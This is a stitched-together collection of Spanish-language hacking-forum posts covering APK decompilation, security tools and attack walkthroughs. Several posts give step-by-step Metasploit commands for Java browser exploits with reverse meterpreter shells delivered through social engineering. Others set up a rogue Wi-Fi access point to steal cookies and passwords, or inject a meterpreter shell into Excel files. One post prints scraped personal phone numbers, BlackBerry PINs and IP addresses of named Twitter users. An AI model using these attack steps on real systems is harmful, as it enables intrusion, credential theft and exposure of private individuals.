Formatos de archivo .DEX y .JAR

Como sabemos la mayoría de aplicaciones para Android están programadas en Java, los ejecutables de este sistema operativo tienen una extensión de tipo .APK, hasta aquí todo bien, pero debemos saber que esta extensión no es más que una variación de la extensión .JAR, por lo que si alguna vez hemos programado en Java sabemos que los .JAR funcionan como una especie de contenedor con varios archivos adentro, por lo que con cualquier compresor podemos extraer su contenido y ver una serie de archivos que son los que componen la aplicación.

Por lo tanto, si a una aplicación Android  (.APK) le extraemos los ficheros con un compresor cualquiera podremos ver todos los ficheros que componen la aplicación:


Uno de estos archivos es classes.dex que será uno de los más importantes pues este es el que contiene las clases y todo el código en general de la aplicación.
Herramientas necesarias

Como mencionábamos más arriba, en Windows para poder ver el código en ensamblador de un archivo con extensión .exe usábamos el OllyDB, en esta ocasión haremos uso de una serie de herramientas que harán lo mismo y con esto podremos ver el código Java.

El proceso será sencillo, pasaremos el archivo .dex a .jar y luego descompilaremos este último. Para esto necesitaremos:

JD-GUI: Es una aplicación con interfaz gráfica muy intuitiva con la que podremos ver el código fuente de los archivos .class (básicamente .jar de Java). Con  esta herramienta podremos ver clases, métodos y otros componentes del programa. Web oficial: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Dex2Jar: Como su nombre nos lo dice, permite pasar de .dex a .jar, podemos usarlo individualmente o en conjunto con las herramientas que nombraremos aquí. Web oficial: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Eclipse: Es un IDE de desarrollo para varias plataformas y que funciona con java. Web oficial: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Configurar .Dex2Jar en Eclipse

Lo primero será configurar un nuevo proyecto, por lo que vamos a File > New > Java Proyect, le ponemos un nombre al proyecto y damos a finalizar.


Seleccionamos nuestro proyecto en explorador de paquetes, luego estando seleccionado vamos al menú Project > Properties > Java Build Path. Allí en la pestaña "Libraries" damos click en "Add external Jars", allí en la ventana que sale ubicamos la carpeta de Dex2Jar y añadimos todos los .Jar de la carpeta a nuestro proyecto y seleccionamos Ok.


Ahora añadimos nuestro fichero .APK al proyecto, es decir, lo arrastramos hasta el explorador de  paquetes.


Ahora hacemos click derecho en la carpeta de nuestro proyecto, seleccionamos Run As > Run Configurations y hacemos doble click en "Java application", por lo que se añadirá una especie de página en la cual podemos pasar argumentos.

Aquí en la pestaña "Main"añadimos el nombre de la clase Main de Dex2Jar, la cual es posible encontrarla haciendo click en el botón "search" de la misma pestaña, en mi caso tiene una estructura así: com.googlecode.dex2jar.v3.Main


Luego vamos a la pestaña arguments y en la primera caja de texto colocamos el nombre de nuestro fichero APK con la extensión:


Damos click en Aplicar (Apply) y luego en "Run", para ver un resultado de este tipo:


Ahora actualizamos nuestro explorador de proyectos (Click derecho y luego le damos "Refresh") y veremos un nuevo fichero con extensión .Jar, es el que necesitábamos.


Descompilar archivos .JAR

Con el proceso anterior obtuvimos un .JAR limpio, ahora debemos "decompilarlo" para así poder ver su código fuente, por lo que abrimos el JD-GUI y allí abrimos nuestro .JAR generado, lo primero que observo son los métodos y en especial uno que dice button1_click(), ya que de seguro allí habrá algo.


Pero bueno, ya a partir de aquí podemos seguir e investigar todo el código, obviamente los conocimientos de programación nunca están demás para entender los algoritmos implicados en la aplicación.

Crackme

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

@Snifer yo se que me amas; xD si tradusco la descripción mejor enséñame ingles xD

Saludos.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Que excelente aporte Stuxnet, no lo conocía, ya has tenido la oportunidad de usarlo?

Si, de ahi fue donde cree el tutorial. Siempre lo testeo antes de publicarlo.

Saludos...

Este módulo de Metasploit abusa de la vulneravilidad matriz indexación no válida en la función storeImageArray() de la función estática para producir una corrupción de memoria y finalmente evadir el Sandbox de Java. La vulnerabilidad afecta a Java versión 7u21 y versiones anteriores.


Explotando CVE-2013-2465 con mestasploit:

// Cargamos el módulo

msf > use exploit/multi/browser/java_storeimagearray

msf exploit(java_storeimagearray) > set PAYLOAD java/meterpreter/reverse_tcp

msf exploit(java_storeimagearray) > set LHOST [IP Local]

msf exploit(java_storeimagearray) > set srvhost [IP Local]

msf exploit(java_storeimagearray) > set uripath /

msf exploit(java_storeimagearray) > exploit

Ahora realizamos un poco de Ingeniería Social para enviar la dirección generada por el metasploit para hacer la sesion meterpreter.

Saludos, \0/

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login es una sencilla herramienta programada en lenguaje Python que, utilizando la API de Twitter, busca determinadas palabras clave para analizar los tweets encontrados y extraer información relativa a:

1) Números de teléfono en el formato internacional de marcación NPA-NXX (por ejemplo, 604-555-5555).
2) Direcciones IP en formato IPv4 (127.0.0.1).
3) Códigos PIN de dispositivos Blackberry (ABCDEF12) para utilizar con Blackberry Messenger (BBM), un servicio similar al conocido Whatsapp.

Todo lo anterior se almacena en una base de datos SQLite (.db) y va mostrando los resultados uno a uno de forma secuencial a través de la consola. En la página del creador se indica que la herramienta ha sido probada en Ubuntu pero que debería funcionar en cualquier otra plataforma capaz de ejecutar Python. En el laboratorio de Hacktimes se ha instalado bajo una distribución Linux Debian Squeeze y, una vez configurado Python adecuadamente, no ha surgido ningún problema con los módulos de Twitter y Sqlite.

Avivore fue presentado en las conferencias de Seguridad B-Sides de Vancouver a principios de marzo de este año 2013 (You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login) y desde entonces el autor está recopilando ideas para darle nuevos usos a la herramienta y así obtener más información de los usuarios que publican alegremente demasiados datos en Twitter.

La instalación es simple.

Citarapt-get install sqlite3
curl -O You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
python distribute_setup.py
curl -O You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
python You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
pip install twitter

hacktimes_lab# python avivore.py

Avivore 1.0
A Twitter-based tool for finding personal data.

Licensed under the LGPL and created by Colin Keigher
http://github.com/ColinKeigher
--------------------------------------------------------

[1365009816] Type: bbpin, User: DjAndresBass, PIN: 2908ABFB, TweetID: 319498790010757121
[1365009816] Type: bbpin, User: 1Okonma, PIN: 26580A0F, TweetID: 319498775104204800
[1365009816] Type: bbpin, User: kopyrit3, PIN: 28B39095, TweetID: 319498184776896512
[1365009816] Type: bbpin, User: AlbaraaNagro, PIN: 271FE0FA, TweetID: 319497093121196032
[1365009826] Type: bbpin, User: shantisusantii, PIN: 284f70a8, TweetID: 319500427693527040
[1365009826] Type: phone, User: soloventasEC, Number: 6660986790, TweetID: 319500381421969410
[1365009826] Type: bbpin, User: shantisusantii, PIN: 284f70a8, TweetID: 319500309141536768
[1365009826] Type: phone, User: Diegoleon007, Number: 3044680505, TweetID: 319500240979890177
[1365009826] Type: bbpin, User: shantisusantii, PIN: 284f70a8, TweetID: 319500216288043008
[1365009857] Type: phone, User: bitch_suck_des, Number: 7343772865, TweetID: 319500316884226048
[1365009867] Type: phone, User: CDFMS, Number: 6628417855, TweetID: 319500569897209856
[1365009867] Type: phone, User: NickRizzi_, Number: 7184905119, TweetID: 319500566948614144
[1365009888] Type: ipadr, User: Africanex, IP: 76.64.191.184, TweetID: 319500002735042562
[1365009888] Type: ipadr, User: Africanex, IP: 70.26.36.130, TweetID: 319499562706423809
[1365009888] Type: ipadr, User: Africanex, IP: 99.232.57.192, TweetID: 319499553558626304
[1365009919] Type: bbpin, User: shantisusantii, PIN: 284f70a8, TweetID: 319500792157593601
[1365009919] Type: bbpin, User: elmejor1393, PIN: 24427bb7, TweetID: 319500680417120257
[1365009919] Type: bbpin, User: gngstryuri, PIN: 284f70a8, TweetID: 319500673769160705
[1365009919] Type: bbpin, User: shantisusantii, PIN: 284f70a8, TweetID: 319500642018275331

Este Kit se ha desarrollado para mejorar las habilidades de los Pentester en los entornos de VoIP, en especial las pruebas de seguridad que se realizan para los procesos de autenticación.

VIPROY permite poner a prueba el sistema de autenticación, proporcionando de este modo un entrenamiento muy interesante para aquellos profesionales (Pentester) que se enfrenten a un test de penetración con infraestructura de VoIP.

Las pruebas o test que se incluyen en el Kit, son:

Options tester: manipulación de las opciones de comunicación en la VoIP, con el protoclo SIP se puede indicar el codec que se utiliza en la comunicación, así como el puerto de conexión. Se puede poner a prueba las opciones.

Brute force: Ataques de fuerza bruta en el proceso de identificación de cada teléfono/ usuario.

Enumerator: Se puede poner en practica la técnica de conseguir información sobre los usaurios y/o terminales de VoIP, que tiene el servidor registrados.

Invite tester: pruebas en el proceso de llamada de los usuarios de VoIP.

Trust analyzer, Proxy/Registration tester: evaluar la seguridad del proceso de registro y la comunicación a través de proxy.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Bienvenido a Underc0de pax01..

Te he visto por masters-hackers xD

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login es una nueva herramienta para auditoria de seguridad con características similares a Nmap pero que hace su incursión al mundo con la capacidad de ser el Escaner de Puertos Transparente ante Snort.

Snort es un Sistema de Detección de Intrusos (IDS) que notifica al Administrador de red sobre paquetes mal formados, escaneos y otros ataques, es una herramienta ideal e imprescindible en Servidores.

El escaner Topera se basa en el Protocolo de Internet versión 6 (IPv6) para explotar una vulnerabilidad presente aun y sin parchar en el IDS Snort.


You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Contenido:

    Chapter 1 Extending OSI to Network Security
    Chapter 2 The Physical Layer
    Chapter 3 Layer 2: The Data Link Layer
    Chapter 4 Layer 3: The Network Layer
    Chapter 5 Layer 4: The Transport Layer
    Chapter 6 Layer 5: The Session Layer
    Chapter 7 Layer 6: The Presentation Layer
    Chapter 8 Layer 7: The Application Layer
    Chapter 9 Layer 8: The People Layer

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Buenas.

El error es porque no tienes los archivos .class en el directorio /opt/metasploit/msf3/data/exploits/CVE-2013-1493

De aqui te puedes descargar los archivos y copiarlos.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Excelente.

Ahora hacerle publicidad a la tool

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Saludos

Karmetasploit sirve para crear puntos de acceso falsos, capturar contraseñas, recopilar infomación, y llevar a los ataques de navegador contralos clientes.

Cuando un usuario se conecta a nuestro AP Fake, la dirección IP la estará asignando el servicio DHCP, y posteriormente karmetasploit intentará ejecutar todos los exploits sobre la maquina objetivo en busca de alguna vulnerabilidad e intentará conseguir una sesión meterpreter.

Descargamos You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Instalamos dhcpd3-server

sudo apt-get install isc-dhcp-server

Una ves instalado procederemos a configurarlo, Quedando de la siguiente manera.

#
# Sample configuration file for ISC dhcpd for Debian
#
# Attention: If /etc/ltsp/dhcpd.conf exists, that will be used as
# configuration file instead of this file.
#
#

# The ddns-updates-style parameter controls whether or not the server will
# attempt to do a DNS update when a lease is confirmed. We default to the
# behavior of the version 2 packages ('none', since DHCP v2 didn't
# have support for DDNS.)
ddns-update-style none;

# option definitions common to all supported networks...
option domain-name "10.0.0.1";
option domain-name-servers 10.0.0.1;

default-lease-time 60;
max-lease-time 72;

# If this DHCP server is the official DHCP server for the local
# network, the authoritative directive should be uncommented.
#authoritative;

# Use this to send dhcp log messages to a different log file (you also
# have to hack syslog.conf to complete the redirection).
log-facility local7;

# No service will be given on this subnet, but declaring it helps the 
# DHCP server to understand the network topology.

#subnet 10.0.0.0 netmask 255.255.255.0 {
#}

# This is a very basic subnet declaration.

#subnet 10.0.0.0 netmask 255.255.255.0 {
#  range 10.0.0.100 10.0.0.254;
#  option routers 10.0.0.1;
#}

Luego procedemos a editar /opt/backbox/msf/data/exploits/capture/http/sites.txt donde están almacenados todos los sitios en los que metasploit intentará robar cookies.

Ahora comenzamos poniendo nuestra tarjeta en modo monitor, en mi caso es la wlan0

airmon-ng start wlan0

Se activará así la interfaz mon0 la cual podemos cambiarle la dirección MAC si lo creemos necesario:

ifconfig mon0 down && macchanger -r mon0 && ifconfig mon0 up

Una vez que la interfaz está lista ya podemos crear nuestro punto de acceso con la ayuda de airbase-ng, tecleemos lo siguiente en la consola:

airbase-ng -P -C 30 -c 6 -e "red_falsa" mon0

Donde mon0 es nuestra tarjeta en modo monitor y "red_falsa" es el nombre que queramos darle a nuestra red.

Este paso anterior nos creará una nueva interfaz llamada at0 a la cual vamos a darle una ip y activamos el servidor dhcp desde otra terminal:

ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
dhcpd -cf /etc/dhcp/dhcpd.conf at0

Ahora iniciamos mestasploit con karma.

msfconsole -r karma.rc

Al iniciar karmetasploit les aparecerá:

Este módulo de Metasploit abusa el método inseguro invoke()  de la clase de ProviderSkeleton que permite para llamar a métodos estáticos arbitrarios con argumentos de usuario. La vulnerabilidad afecta a la versión Java 7u21 y versiones anteriores.


Explotando CVE-2013-2460 con mestasploit:

// Cargamos el módulo

msf > use exploit/multi/browser/java_jre17_provider_skeleton

// Cargamos el payload para el meterpreter

msf exploit(java_jre17_provider_skeleton) > set PAYLOAD java/meterpreter/reverse_tcp

msf exploit(java_jre17_provider_skeleton) > set LHOST [IP Local]

msf exploit(java_jre17_provider_skeleton) > set srvhost [IP Local]

msf exploit(java_jre17_provider_skeleton) > set uripath /

msf exploit(java_jre17_provider_skeleton) > exploit

Ahora realizamos un poco de Ingeniería Social para enviar la dirección generada por el metasploit para hacer la sesion meterpreter.

X-Ways Forensics, es un avanzado entorno de trabajo para analistas forenses que funciona sobre plataformas Windows 2000 / XP / 2003 / Vista / Seven / 2008 con tecnologías de 32 y 64 Bits.

Algunas de las características de X-Ways Forensics son:

Posibilidad de crear imágenes o copiados seguros de evidencias digitales.
Recuperación de información eliminada.
Visualizar estructuras de directorios sobre imágenes del tipo .dd.
Acceder a discos, RAIDs, e imágenes de gran tamaño (2Tb).
Soporte nativo para FAT12, FAT16, FAT32, TFAT, NTFS, Ext2, Ext3, Ext4, CDFS/ISO9660/Jolite, UDF.
Visualización y volcado de memoria RAM y memoria virtual de procesos en ejecución.
Creación de medios forenses estériles.
Generación y cálculo de firmas criptográficas (CRC32, MD4, ed2k, MD5, SHA-1, SHA-256, RipeMD.
Capacidades de búsquedas en la evidencia recolectada.
Bookmarks.
Anotaciones y un largo etc.
Para más información sobre X-Ways Forensics visita su Web oficial You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Manual oficial de usuario para X-Ways forensics (pdf) You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

QuickStart Guide (pdf) You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

---

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

  Excelente aporte.

Saludos 

Es una herramienta creada en perl por keith lee que permite inyectar en un archivo XLS de Microsoft Excel una consola meterpreter (ejecutando todo en la memoria ram sin crear procesos adicionales), permitiéndonos acceder a el remotamente por el puerto 4444 y tomar total control de la maquina.

Para que XLSInjector funcione adecuadamente, necesitamos lo siguiente:

    * Una Maquina (virtual o real) con Windows
    * Microsoft Excel
    * Perl
    * El modulo Win32:OLE para Perl
    * Un archivo XML a infectar
    * El You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
    * y por ultimo el Metasploit Framework

Después de tener todos los elementos necesarios para el correcto funcionamiento del XLSInjector pasamos a su ejecución, que es bastante simple:

perl xlsinjector.pl -i ArchivoDeExcel.xls -o ArchivoConShellDeExcel.xls

Pero no todo es tan simple con esta herramienta, resulta que XLSInjector NO salta los filtros de scripting puestos por Microsoft en su suite ofimática, por lo que toca convencer, por medio de ingeniería social o cualquier otra técnica que el mismo usuario ponga la seguridad de las macros en baja y que "confié" en los proyectos de VB, algo complicado pero que seguro con algo de presunción se consigue que realicen estas tareas.

Suponiendo que ya se realizaron las configuraciones adecuadas para el correcto funcionamiento del XLSInjector vamos a acceder remotamente a nuestra shell meterpreter mediante la consola del Metasploit Framework

iniciamos la consola del metasploit:

set payload windows/meterpreter/bind_tcp
set RHOST ipdelpcvictima
set RPOT 4444
exploit

Aburrido cuando entro no hay nadie, mejor que se organize un día en general para que entren todos y no estar de Forever Alone en el IRC.

Por eso es que casi nadie los usa.

xD

Jajajajajaja xD

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Yo creo que todos aqui somos autodidactas que sino no estuvieramos aqui salu2

Excelente iniciativa aika siga así.

Saludos.

xD